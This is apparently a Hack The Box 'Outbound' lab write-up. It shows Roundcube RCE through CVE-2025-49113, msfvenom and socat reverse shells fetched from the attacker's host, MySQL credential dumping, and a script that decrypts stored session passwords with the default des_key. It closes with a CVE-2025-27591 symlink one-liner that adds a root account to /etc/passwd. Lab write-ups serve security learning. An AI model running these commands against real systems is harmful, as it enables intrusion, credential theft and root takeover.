![[Outbound.png]]
# **Nmap Results**
```bash
# Replace <target_ip> and <target_domain>
echo -e "\ntarget_ip=10.129.32.146\ntarget_domain=outbound.htb" | tee -a ~/.bashrc
exec bash
echo "$target_ip $target_domain" | sudo tee -a /etc/hosts
mkdir -p ~/my_data/$target_domain/nmap && cd ~/my_data/$target_domain
# Scan all TCP ports
sudo nmap -sC -sV -oA nmap/full.tcp -p- $target_ip -vvv
# Scan top 1000 UDP ports
sudo nmap -sU -oA nmap/initial.udp $target_ip -vvv
# Scan top 100 UDP ports using a faster timing template (separate output name so it does not overwrite the scan above)
sudo nmap -sU -oA nmap/fast.udp -T4 -F $target_ip -vvv
```
```text
# Nmap 7.94SVN scan initiated Wed Oct 15 20:08:55 2025 as: nmap -sC -sV -oA nmap/full.tcp -p- 10.129.32.146
Nmap scan report for outbound.htb (10.129.32.146)
Host is up (0.0090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 15 20:09:11 2025 -- 1 IP address (1 host up) scanned in 16.81 seconds
```
# **Service Enumeration**
## **TCP/80**
### **Roundcube Webmail**
Navigated to `http://mail.outbound.htb/` and logged in to the Roundcube Webmail portal with the provided credentials, `tyler::LhKL1o9Nm3X2`. Nothing of interest was in the user's inbox, but the Roundcube version was identified (screenshot below).
![[Outbound - Roudcube Webmail Version.png]]
# **Exploit**
## **CVE-2025-49113**
The version running on the target is vulnerable to CVE-2025-49113, a post-authentication remote code execution flaw in Roundcube before 1.5.10 and 1.6.x before 1.6.11. The `_from` parameter of `program/actions/settings/upload.php` is not validated and ends up in the PHP session, which allows PHP object injection on deserialization and from there command execution as the web server user. Valid webmail credentials (here `tyler`'s) are required.
```bash
wget https://raw.githubusercontent.com/fearsoff-org/CVE-2025-49113/refs/heads/main/CVE-2025-49113.php -O CVE-2025-49113.php
```
Validated that RCE is possible by making the target fetch a file from an HTTP listener on the op station; the GET request in the `http.server` log confirms the command ran.
```bash
python3 -m http.server 8081
php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 'wget http://10.10.14.19:8081/index.html'
```
Attempted to use the standard reverse shell, but it kept dying. For a more stable C2 channel, I decided to create a `msfvenom` payload, `base64` encode it, transfer it to the target, and run it.
```bash
# Create the implant and base64 encode it
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.19 LPORT=58951 -f elf -o reverse.elf
base64 -w0 reverse.elf
# Start a listener on the op station
nc -lvnp 58951
# Exploit the vulnerability to upload and execute the implant
php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 'echo "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAwgAAAAAAAAAMAQAAAAAAAAAQAAAAAAAAailYmWoCX2oBXg8FSJdIuQIA5kcKCg4TUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlIuy9iaW4vc2gAU0iJ51JXSInmDwU=" | base64 -d > /tmp/a; chmod +x /tmp/a; /tmp/a'
```
## **Finding MySQL Credentials, DES Key, and Session Information**
During enumeration from the web shell, the Roundcube configuration file was found. It contains the MySQL DSN (user `roundcube`, password `RCDBPass2025`) and the `des_key` that Roundcube uses to encrypt the IMAP password stored in each session record. Note that the key is still the sample value shipped in Roundcube's default configuration, which the comment directly above it warns against. The key is needed later to recover a user's password from the `session` table.
```bash
cat /var/www/html/roundcube/config/config.inc.php
```
```php
...SNIP...
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';
...SNIP...
// This key is used to encrypt the users imap password which is stored
// in the session record. For the default cipher method it must be
// exactly 24 characters long.
// YOUR KEY MUST BE DIFFERENT THAN THE SAMPLE VALUE FOR SECURITY REASONS
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';
...SNIP...
```
To take advantage of the `mysql` credentials, the `netcat` shell needed to be upgraded to a pseudo-TTY shell. The target system did not have `python` installed, so a statically linked `socat` binary was uploaded to the target.
```bash
# Host the statically linked socat binary on the op station
python3 -m http.server 8081
# Start a listener on the op station
nc -lvnp 58952
# Exploit the vulnerability to upload and execute socat (EXEC:sh needs no extra quotes inside the single-quoted command string)
php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 'wget http://10.10.14.19:8081/socat -O /tmp/s; chmod +x /tmp/s; nohup /tmp/s TCP:10.10.14.19:58952 EXEC:sh,pty,stderr,setsid,sigint,sane'
```
Connect to the `mysql` instance.
```
mysql -u roundcube -pRCDBPass2025
```
List available databases.
```
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| roundcube |
+--------------------+
2 rows in set (0.002 sec)
```
Select the database to use.
```
MariaDB [(none)]> use roundcube;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
```
Show available tables in the database.
```
MariaDB [roundcube]> show tables;
+---------------------+
| Tables_in_roundcube |
+---------------------+
| cache |
| cache_index |
| cache_messages |
| cache_shared |
| cache_thread |
| collected_addresses |
| contactgroupmembers |
| contactgroups |
| contacts |
| dictionary |
| filestore |
| identities |
| responses |
| searches |
| session |
| system |
| users |
+---------------------+
17 rows in set (0.001 sec)
```
Display the contents of the `users` table vertically (`\G` prints one column per line).
```
MariaDB [roundcube]> select * from users\G
*************************** 1. row ***************************
user_id: 1
username: jacob
mail_host: localhost
created: 2025-06-07 13:55:18
last_login: 2025-06-11 07:52:49
failed_login: 2025-10-16 02:53:49
failed_login_counter: 3
language: en_US
preferences: a:1:{s:11:"client_hash";s:16:"hpLLqLwmqbyihpi7";}
*************************** 2. row ***************************
user_id: 2
username: mel
mail_host: localhost
created: 2025-06-08 12:04:51
last_login: 2025-06-08 13:29:05
failed_login: 2025-10-16 02:27:59
failed_login_counter: 1
language: en_US
preferences: a:1:{s:11:"client_hash";s:16:"GCrPGMkZvbsnc3xv";}
*************************** 3. row ***************************
user_id: 3
username: tyler
mail_host: localhost
created: 2025-06-08 13:28:55
last_login: 2025-10-16 02:29:42
failed_login: 2025-10-16 01:37:53
failed_login_counter: 1
language: en_US
preferences: a:2:{s:11:"client_hash";s:16:"5HgZDhZGyrNnR2b7";i:0;b:0;}
3 rows in set (0.000 sec)
```
Display the contents of the `session` table vertically.
```
MariaDB [roundcube]> select * from session\G
*************************** 1. row ***************************
sess_id: 6a5ktqih5uca6lj8vrmgh9v0oh
changed: 2025-06-08 15:46:40
ip: 172.17.0.1
vars: bGFuZ3VhZ2V8czo1OiJlbl9VUyI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3M6MToiLyI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6MTA6InByZWZpeF9vdXQiO3M6MDoiIjt9aW1hcF9kZWxpbWl0ZXJ8czoxOiIvIjtpbWFwX2xpc3RfY29uZnxhOjI6e2k6MDtOO2k6MTthOjA6e319dXNlcl9pZHxpOjE7dXNlcm5hbWV8czo1OiJqYWNvYiI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8YjowO3Bhc3N3b3JkfHM6MzI6Ikw3UnYwMEE4VHV3SkFyNjdrSVR4eGNTZ25JazI1QW0vIjtsb2dpbl90aW1lfGk6MTc0OTM5NzExOTt0aW1lem9uZXxzOjEzOiJFdXJvcGUvTG9uZG9uIjtTVE9SQUdFX1NQRUNJQUwtVVNFfGI6MTthdXRoX3NlY3JldHxzOjI2OiJEcFlxdjZtYUk5SHhETDVHaGNDZDhKYVFRVyI7cmVxdWVzdF90b2tlbnxzOjMyOiJUSXNPYUFCQTF6SFNYWk9CcEg2dXA1WEZ5YXlOUkhhdyI7dGFza3xzOjQ6Im1haWwiO3NraW5fY29uZmlnfGE6Nzp7czoxNzoic3VwcG9ydGVkX2xheW91dHMiO2E6MTp7aTowO3M6MTA6IndpZGVzY3JlZW4iO31zOjIyOiJqcXVlcnlfdWlfY29sb3JzX3RoZW1lIjtzOjk6ImJvb3RzdHJhcCI7czoxODoiZW1iZWRfY3NzX2xvY2F0aW9uIjtzOjE3OiIvc3R5bGVzL2VtYmVkLmNzcyI7czoxOToiZWRpdG9yX2Nzc19sb2NhdGlvbiI7czoxNzoiL3N0eWxlcy9lbWJlZC5jc3MiO3M6MTc6ImRhcmtfbW9kZV9zdXBwb3J0IjtiOjE7czoyNjoibWVkaWFfYnJvd3Nlcl9jc3NfbG9jYXRpb24iO3M6NDoibm9uZSI7czoyMToiYWRkaXRpb25hbF9sb2dvX3R5cGVzIjthOjM6e2k6MDtzOjQ6ImRhcmsiO2k6MTtzOjU6InNtYWxsIjtpOjI7czoxMDoic21hbGwtZGFyayI7fX1pbWFwX2hvc3R8czo5OiJsb2NhbGhvc3QiO3BhZ2V8aToxO21ib3h8czo1OiJJTkJPWCI7c29ydF9jb2x8czowOiIiO3NvcnRfb3JkZXJ8czo0OiJERVNDIjtTVE9SQUdFX1RIUkVBRHxhOjM6e2k6MDtzOjEwOiJSRUZFUkVOQ0VTIjtpOjE7czo0OiJSRUZTIjtpOjI7czoxNDoiT1JERVJFRFNVQkpFQ1QiO31TVE9SQUdFX1FVT1RBfGI6MDtTVE9SQUdFX0xJU1QtRVhURU5ERUR8YjoxO2xpc3RfYXR0cmlifGE6Njp7czo0OiJuYW1lIjtzOjg6Im1lc3NhZ2VzIjtzOjI6ImlkIjtzOjExOiJtZXNzYWdlbGlzdCI7czo1OiJjbGFzcyI7czo0MjoibGlzdGluZyBtZXNzYWdlbGlzdCBzb3J0aGVhZGVyIGZpeGVkaGVhZGVyIjtzOjE1OiJhcmlhLWxhYmVsbGVkYnkiO3M6MjI6ImFyaWEtbGFiZWwtbWVzc2FnZWxpc3QiO3M6OToiZGF0YS1saXN0IjtzOjEyOiJtZXNzYWdlX2xpc3QiO3M6MTQ6ImRhdGEtbGFiZWwtbXNnIjtzOjE4OiJUaGUgbGlzdCBpcyBlbXB0eS4iO311bnNlZW5fY291bnR8YToyOntzOjU6IklOQk9YIjtpOjI7czo1OiJUcmFzaCI7aTowO31mb2xkZXJzfGE6MTp7czo1OiJJTkJPWCI7YToyOntzOjM6ImNudCI7aToyO3M6NjoibWF4dWlkIjtpOjM7fX1saXN0X21vZF9zZXF8czoyOiIxMCI7
1 row in set (0.001 sec)
```
The `vars` column holds base64-encoded PHP session data, a sequence of `name|serialized value` pairs. The data was saved to a local file and decoded. The important fields are `username` and `password`; `password` is not a hash but `jacob`'s IMAP password encrypted with `des_key`, so it can be recovered.
```bash
cat session_id.txt | base64 -d
```
```
language|s:5:"en_US";imap_namespace|a:4:{s:8:"personal";a:1:{i:0;a:2:{i:0;s:0:"";i:1;s:1:"/";}}s:5:"other";N;s:6:"shared";N;s:10:"prefix_out";s:0:"";}imap_delimiter|s:1:"/";imap_list_conf|a:2:{i:0;N;i:1;a:0:{}}user_id|i:1;username|s:5:"jacob";storage_host|s:9:"localhost";storage_port|i:143;storage_ssl|b:0;password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";login_time|i:1749397119;timezone|s:13:"Europe/London";STORAGE_SPECIAL-USE|b:1;auth_secret|s:26:"DpYqv6maI9HxDL5GhcCd8JaQQW";request_token|s:32:"TIsOaABA1zHSXZOBpH6up5XFyayNRHaw";task|s:4:"mail";skin_config|a:7:{s:17:"supported_layouts";a:1:{i:0;s:10:"widescreen";}s:22:"jquery_ui_colors_theme";s:9:"bootstrap";s:18:"embed_css_location";s:17:"/styles/embed.css";s:19:"editor_css_location";s:17:"/styles/embed.css";s:17:"dark_mode_support";b:1;s:26:"media_browser_css_location";s:4:"none";s:21:"additional_logo_types";a:3:{i:0;s:4:"dark";i:1;s:5:"small";i:2;s:10:"small-dark";}}imap_host|s:9:"localhost";page|i:1;mbox|s:5:"INBOX";sort_col|s:0:"";sort_order|s:4:"DESC";STORAGE_THREAD|a:3:{i:0;s:10:"REFERENCES";i:1;s:4:"REFS";i:2;s:14:"ORDEREDSUBJECT";}STORAGE_QUOTA|b:0;STORAGE_LIST-EXTENDED|b:1;list_attrib|a:6:{s:4:"name";s:8:"messages";s:2:"id";s:11:"messagelist";s:5:"class";s:42:"listing messagelist sortheader fixedheader";s:15:"aria-labelledby";s:22:"aria-label-messagelist";s:9:"data-list";s:12:"message_list";s:14:"data-label-msg";s:18:"The list is empty.";}unseen_count|a:2:{s:5:"INBOX";i:2;s:5:"Trash";i:0;}folders|a:1:{s:5:"INBOX";a:2:{s:3:"cnt";i:2;s:6:"maxuid";i:3;}}list_mod_seq|s:2:"10";
```
## **Decrypting DES-EDE3-CBC**
Looking through the Roundcube source code, I identified the functions used to encrypt or decrypt a user's `password`.
```bash
cat /var/www/html/roundcube/program/lib/Roundcube/rcube.php
grep 'public function encrypt' -A 85 /var/www/html/roundcube/program/lib/Roundcube/rcube.php
```
```php
public function encrypt($clear, $key = 'des_key', $base64 = true)
{
    if (!is_string($clear) || !strlen($clear)) {
        return '';
    }

    $ckey   = $this->config->get_crypto_key($key);
    $method = $this->config->get_crypto_method();
    $iv     = rcube_utils::random_bytes(openssl_cipher_iv_length($method), true);
    $tag    = null;

    // This distinction is for PHP 7.3 which throws a warning when
    // we use $tag argument with non-AEAD cipher method here
    if (!preg_match('/-(gcm|ccm|poly1305)$/i', $method)) {
        $cipher = openssl_encrypt($clear, $method, $ckey, OPENSSL_RAW_DATA, $iv);
    }
    else {
        $cipher = openssl_encrypt($clear, $method, $ckey, OPENSSL_RAW_DATA, $iv, $tag);
    }

    if ($cipher === false) {
        self::raise_error([
                'file'    => __FILE__,
                'line'    => __LINE__,
                'message' => "Failed to encrypt data with configured cipher method: $method!"
            ], true, false);

        return false;
    }

    $cipher = $iv . $cipher;

    if ($tag !== null) {
        $cipher = "##{$tag}##{$cipher}";
    }

    return $base64 ? base64_encode($cipher) : $cipher;
}

/**
 * Decrypt a string
 *
 * @param string $cipher Encrypted text
 * @param string $key    Encryption key to retrieve from the configuration, defaults to 'des_key'
 * @param bool   $base64 Whether or not input is base64-encoded
 *
 * @return string|false Decrypted text, false on error
 */
public function decrypt($cipher, $key = 'des_key', $base64 = true)
{
    // @phpstan-ignore-next-line
    if (!is_string($cipher) || !strlen($cipher)) {
        return false;
    }

    if ($base64) {
        $cipher = base64_decode($cipher);
        if ($cipher === false) {
            return false;
        }
    }

    $ckey    = $this->config->get_crypto_key($key);
    $method  = $this->config->get_crypto_method();
    $iv_size = openssl_cipher_iv_length($method);
    $tag     = null;

    if (preg_match('/^##(.{16})##/s', $cipher, $matches)) {
        $tag    = $matches[1];
        $cipher = substr($cipher, strlen($matches[0]));
    }

    $iv = substr($cipher, 0, $iv_size);

    // session corruption? (#1485970)
    if (strlen($iv) < $iv_size) {
        return false;
    }

    $cipher = substr($cipher, $iv_size);
    $clear  = openssl_decrypt($cipher, $method, $ckey, OPENSSL_RAW_DATA, $iv, $tag);

    return $clear;
}
```
Further enumeration was done to identify which crypto method is configured. `rcube_config::get_crypto_method()` returns `cipher_method` from the config when it is set and otherwise falls back to `DES-EDE3-CBC`, which is what applied here: three-key Triple DES (the 24-byte `des_key` is the three 8-byte DES keys) in CBC mode with an 8-byte IV prepended to the ciphertext. `OPENSSL_RAW_DATA` only disables base64 handling inside OpenSSL, so the default PKCS#7 padding is in use and is stripped on decryption.
```bash
grep -i get_crypto_method -R /var/www/html/roundcube
```
```
grep: /var/www/html/roundcube/public_html/roundcube: warning: recursive directory loop
/var/www/html/roundcube/program/lib/Roundcube/rcube_config.php: public function get_crypto_method()
/var/www/html/roundcube/program/lib/Roundcube/rcube.php: $method = $this->config->get_crypto_method();
/var/www/html/roundcube/program/lib/Roundcube/rcube.php: $method = $this->config->get_crypto_method();
```
```bash
grep get_crypto_method -C 5 /var/www/html/roundcube/program/lib/Roundcube/rcube_config.php
```
```php
/**
 * Return configured crypto method.
 *
 * @return string Crypto method
 */
public function get_crypto_method()
{
    return $this->get('cipher_method') ?: 'DES-EDE3-CBC';
}
```
The two pieces of information used to decrypt `jacob`'s `password` are as follows:
```
# password
L7Rv00A8TuwJAr67kITxxcSgnIk25Am/
# des_key
rcmail-!24ByteDESkey*Str
```
Looking at the decrypt function, I was able to decrypt `jacob`'s password via Cyberchef by doing the following:
1. Base64 decode `password` from the `mysql` instance
2. Convert output to hex
3. Split the hex into the IV and the ciphertext. For DES-EDE3-CBC, the first 8 bytes are the IV (`2fb46fd3403c4eec`) and the remainder is the ciphertext (`0902bebb9084f1c5c4a09c8936e409bf`)
4. Use Cyberchef to decrypt the cipher text by specifying the IV, key, mode, and input format
5. ...
6. Profit
![[Outbound - Cyberchef Decode and Convert to Hex.png]]
![[Outbound - Cyberchef Decrypt Triple DES.png]]
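The script below is an added example (mine, not part of the original writeup and not Roundcube code) that does the same job as the CyberChef steps with coreutils and the `openssl` CLI, and also covers the earlier step of pulling `username` and `password` out of the decoded session `vars`. It mirrors `rcube::decrypt()`: base64-decode the blob, take the first 8 bytes as the IV, decrypt the rest as DES-EDE3-CBC with `des_key`, and let `openssl` strip the PKCS#7 padding. The session text is a shortened excerpt of the decoded `vars` data shown earlier; function names and the `hex` helper are mine.

```bash
#!/bin/sh
# Added example (not from the writeup or from Roundcube): recover a user's
# IMAP password from a Roundcube session record with coreutils + openssl.
# Steps mirror rcube::decrypt(): base64-decode, first 8 bytes are the IV
# (openssl_cipher_iv_length('DES-EDE3-CBC')), decrypt the remainder with
# des_key in DES-EDE3-CBC mode, openssl strips the PKCS#7 padding.

# Shortened excerpt of the decoded `vars` column shown earlier (constructed
# from the page; the real record is much longer).
SESSION_VARS='user_id|i:1;username|s:5:"jacob";storage_host|s:9:"localhost";storage_port|i:143;storage_ssl|b:0;password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";login_time|i:1749397119;'
SESSION_PASSWORD='L7Rv00A8TuwJAr67kITxxcSgnIk25Am/'
DES_KEY='rcmail-!24ByteDESkey*Str'   # $config['des_key'] from config.inc.php

hex() { od -A n -v -t x1 | tr -d ' \n'; }

# rc_session_string <decoded session text> <field>
# Pulls a PHP-serialized string field (field|s:N:"value";) out of the session
# data using the length prefix N rather than trusting the closing quote.
# Returns 1 when the field is absent.
rc_session_string() {
    printf '%s' "$1" | awk -v f="$2" '{
        i = index($0, f "|s:")
        if (i == 0) exit 1
        rest = substr($0, i + length(f) + 3)   # text after "field|s:", begins with N
        n = rest + 0                           # awk converts the leading digits
        q = index(rest, "\"")                  # opening quote of the value
        print substr(rest, q + 1, n)
    }'
}

# First 8 bytes of the decoded blob: the IV prepended by rcube::encrypt()
rc_iv_hex() { printf '%s' "$1" | base64 -d | head -c 8 | hex; }

# Everything after the IV: the DES-EDE3-CBC ciphertext
rc_ct_hex() { printf '%s' "$1" | base64 -d | tail -c +9 | hex; }

# rc_decrypt <base64 blob from the session> <24-byte des_key>
rc_decrypt() {
    blob=$1
    key=$2
    if [ "${#key}" -ne 24 ]; then
        echo "des_key must be exactly 24 bytes for DES-EDE3-CBC" >&2
        return 1
    fi
    printf '%s' "$blob" | base64 -d | tail -c +9 |
        openssl enc -d -des-ede3-cbc \
            -K "$(printf '%s' "$key" | hex)" \
            -iv "$(rc_iv_hex "$blob")"
}

# Usage: pull the encrypted password out of the session record and decrypt it
enc=$(rc_session_string "$SESSION_VARS" password)
printf 'username : %s\n' "$(rc_session_string "$SESSION_VARS" username)"
printf 'iv       : %s\n' "$(rc_iv_hex "$enc")"
printf 'cipher   : %s\n' "$(rc_ct_hex "$enc")"
printf 'password : %s\n' "$(rc_decrypt "$enc" "$DES_KEY")"
```

Because `des_key` is the sample value from the default configuration, anyone who can read the `session` table (or the DSN in `config.inc.php`) can do this for every logged-in user; the key length check matters because OpenSSL would otherwise silently reject or truncate an oddly sized key.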
## **Accessing Roundcube Webmail Portal and Finding SSH Credentials**
Log in to the Roundcube Webmail portal with `jacob`'s credentials. The user has an email in their Inbox with SSH credentials.
```
# Roundcube creds
jacob::595mO8DmwGeD
# SSH creds
jacob::gY4Wr3a1evp4
```
![[Outbound - Jacob's Inbox.png]]
# **Post-Exploit Enumeration**
## **Operating Environment**
> [!tldr]- OS & Kernel
> ```bash
> jacob@outbound:~$ uname -a
> Linux outbound 6.8.0-63-generic #66-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 13 20:25:30 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
> jacob@outbound:~$ cat /etc/os-release
> PRETTY_NAME="Ubuntu 24.04.2 LTS"
> NAME="Ubuntu"
> VERSION_ID="24.04"
> VERSION="24.04.2 LTS (Noble Numbat)"
> VERSION_CODENAME=noble
> ID=ubuntu
> ID_LIKE=debian
> HOME_URL="https://www.ubuntu.com/"
> SUPPORT_URL="https://help.ubuntu.com/"
> BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
> PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
> UBUNTU_CODENAME=noble
> LOGO=ubuntu-logo
> ```
> [!tldr]- Current User
> ```bash
> jacob@outbound:~$ id
> uid=1002(jacob) gid=1002(jacob) groups=1002(jacob),100(users)
> jacob@outbound:~$ sudo -l
> Matching Defaults entries for jacob on outbound:
>     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
>
> User jacob may run the following commands on outbound:
>     (ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*
> ```
## **Users and Groups**
> [!tldr]- Local Users
> ```bash
> jacob@outbound:~$ cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
> bin:x:2:2:bin:/bin:/usr/sbin/nologin
> sys:x:3:3:sys:/dev:/usr/sbin/nologin
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/usr/sbin/nologin
> man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
> lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
> mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
> news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
> uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
> proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
> www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
> backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
> list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
> irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
> _apt:x:42:65534::/nonexistent:/usr/sbin/nologin
> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
> systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
> systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
> messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
> systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
> pollinate:x:102:1::/var/cache/pollinate:/bin/false
> polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
> syslog:x:103:104::/nonexistent:/usr/sbin/nologin
> uuidd:x:104:105::/run/uuidd:/usr/sbin/nologin
> tcpdump:x:105:107::/nonexistent:/usr/sbin/nologin
> tss:x:106:108:TPM software stack,,,:/var/lib/tpm:/bin/false
> landscape:x:107:109::/var/lib/landscape:/usr/sbin/nologin
> fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
> usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
> sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
> _laurel:x:999:988::/var/log/laurel:/bin/false
> mel:x:1000:1000:,,,:/home/mel:/bin/bash
> tyler:x:1001:1001:,,,:/home/tyler:/bin/bash
> jacob:x:1002:1002:,,,:/home/jacob:/bin/bash
> ```
> [!tldr]- Local Groups
> ```bash
> jacob@outbound:~$ cat /etc/group
> root:x:0:
> daemon:x:1:
> bin:x:2:
> sys:x:3:
> adm:x:4:syslog
> tty:x:5:
> disk:x:6:
> lp:x:7:
> mail:x:8:
> news:x:9:
> uucp:x:10:
> man:x:12:
> proxy:x:13:
> kmem:x:15:
> dialout:x:20:
> fax:x:21:
> voice:x:22:
> cdrom:x:24:
> floppy:x:25:
> tape:x:26:
> sudo:x:27:
> audio:x:29:
> dip:x:30:
> www-data:x:33:
> backup:x:34:
> operator:x:37:
> list:x:38:
> irc:x:39:
> src:x:40:
> shadow:x:42:
> utmp:x:43:
> video:x:44:
> sasl:x:45:
> plugdev:x:46:
> staff:x:50:
> games:x:60:
> users:x:100:mel,tyler,jacob
> nogroup:x:65534:
> systemd-journal:x:999:
> systemd-network:x:998:
> systemd-timesync:x:997:
> input:x:996:
> sgx:x:995:
> kvm:x:994:
> render:x:993:
> lxd:x:101:
> messagebus:x:102:
> systemd-resolve:x:992:
> _ssh:x:103:
> polkitd:x:991:
> crontab:x:990:
> syslog:x:104:
> uuidd:x:105:
> rdma:x:106:
> tcpdump:x:107:
> tss:x:108:
> landscape:x:109:
> fwupd-refresh:x:989:
> netdev:x:110:
> _laurel:x:988:
> docker:x:987:
> mel:x:1000:
> tyler:x:1001:
> jacob:x:1002:
> jacob@outbound:~$ cat /etc/group | grep jacob
> users:x:100:mel,tyler,jacob
> jacob:x:1002:
> ```
## **Network Configurations**
> [!tldr]- Network Interfaces
>```bash
>jacob@outbound:~$ ip addr
>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
> link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
> inet 127.0.0.1/8 scope host lo
> valid_lft forever preferred_lft forever
>2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
> link/ether 00:50:56:b0:9d:a1 brd ff:ff:ff:ff:ff:ff
> altname enp3s0
> altname ens160
> inet 10.129.232.158/16 brd 10.129.255.255 scope global dynamic eth0
> valid_lft 2796sec preferred_lft 2796sec
>3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
> link/ether b6:e1:0c:ec:ea:72 brd ff:ff:ff:ff:ff:ff
> inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
> valid_lft forever preferred_lft forever
>4: veth09f1c36@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
> link/ether 06:19:6d:38:03:90 brd ff:ff:ff:ff:ff:ff link-netnsid 0
>```
>[!tldr]- Open Ports
> ```bash
> jacob@outbound:~$ ss -tanup | grep -i listen
> tcp LISTEN 0 4096 127.0.0.1:5000 0.0.0.0:*
> tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
> tcp LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
> tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
> tcp LISTEN 0 511 [::]:80 [::]:*
> tcp LISTEN 0 4096 *:22 *:*
> ```
# **Privilege Escalation**
## **CVE-2025-27591**
Based on the post-exploitation enumeration, the user `jacob` can run the following with `sudo` and no password:
```bash
jacob@outbound:~$ sudo -l
Matching Defaults entries for jacob on outbound:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User jacob may run the following commands on outbound:
(ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*
```
Research revealed CVE-2025-27591. Below is a description of the vulnerability.
>A privilege escalation vulnerability existed in the Below service prior to v0.9.0 due to the creation of a world-writable directory at /var/log/below. This could have allowed local unprivileged users to escalate to root privileges through symlink attacks that manipulate files such as /etc/shadow.
Exploiting the vulnerability is as simple as running the following command. Because `/var/log/below` is world-writable, `jacob` can pre-create `below`'s per-user error log, `error_root.log`, as a symlink to `/etc/passwd`; when `sudo below snapshot` runs, root opens that log through the symlink and loosens its permissions (the log file is made world-writable), so `/etc/passwd` becomes writable by `jacob`. The one-liner then appends a UID 0 account with an empty password field and switches to it with `su`. Note that the `sudo` rule only excludes `--config`, `--debug` and `-d`, so the `snapshot` subcommand is allowed.
```bash
u=$(id -un root); rm -f /var/log/below/error_"$u".log; ln -s /etc/passwd /var/log/below/error_"$u".log; export LOGS_DIRECTORY=/var/log/below; sudo /usr/bin/below snapshot --begin now 2>/dev/null || true; echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd; su pwn
```
